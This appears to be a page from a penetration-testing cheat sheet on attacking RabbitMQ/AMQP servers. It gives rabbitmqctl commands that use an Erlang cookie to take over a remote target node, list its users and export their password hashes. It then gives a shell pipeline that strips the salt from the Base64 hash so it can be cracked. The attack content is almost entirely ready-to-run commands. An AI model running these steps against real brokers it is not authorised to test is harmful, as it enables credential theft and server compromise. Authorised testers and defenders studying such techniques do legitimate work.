Protocol

We can use rabbitmqctl command for interacting with the AMQP server from remote machine.
If it does not exist on your machine, install it with the following command:

sudo apt install rabbitmq-server

Now we can use it.

# Get status
sudo rabbitmqctl --erlang-cookie "abcde..." --node rabbit@<target-hostname> status

# Get all users
sudo rabbitmqctl --erlang-cookie "abcde..." --node rabbit@<target-hostname> list_users

# Dump user password hash (format: Base64 encoded RabbitMQ SHA-256)
sudo rabbitmqctl --erlang-cookie "abcde..." --node rabbit@<target-hostname> export_definitions /tmp/output.json

Get Password

If we get the password hash after the rabbitmqctl export_definitions command, we can extract the password from it. The hash is Base64-encoded and the format is as below by default:

BASE64(4_BYTE_SALT + SHA256(4_BYTE_SALT + PASSWORD))

So extract the SHA256 hash with the following command:

# cut -c9-: Output from the 9th character (to extract the first 4 bytes)
echo -n '<password_hash>' | base64 -d | xxd -p -c 1000 | cut -c9-

Protocol

Port Forwarding

WiFi

Attack

Tool

VPN

Others

AMQP (Advanced Message Queuing Protocol)

Connect

Get Password

ON THIS PAGE